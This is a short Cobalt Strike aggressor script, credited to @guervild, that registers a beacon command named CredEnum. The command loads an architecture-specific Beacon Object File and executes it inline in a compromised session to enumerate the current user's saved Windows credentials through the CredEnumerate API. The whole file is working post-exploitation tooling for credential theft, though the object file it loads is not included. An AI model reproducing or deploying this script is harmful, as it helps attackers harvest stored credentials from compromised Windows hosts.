#CredEnum

beacon_command_register("CredEnum", "Enumerate creds through wincred API",
    	"Enumerate saved Windows Credential for the current user using CredEnumerate()");

alias CredEnum {
	local('$handle $data $args');
	
	$bid = $1;

	# figure out the arch of this session
	$barch  = barch($1);

	# read in the right BOF file
	$handle = openf(script_resource("CredEnum.".$barch.".o"));
	$data = readb($handle, -1);
	closef($handle);

	# pack our arguments
	$args = bof_pack($bid, "z", $2);
	
	btask($bid, "CredEnum (@guervild)");
	
	# execute it.
	beacon_inline_execute($bid, $data, "go", $args);
}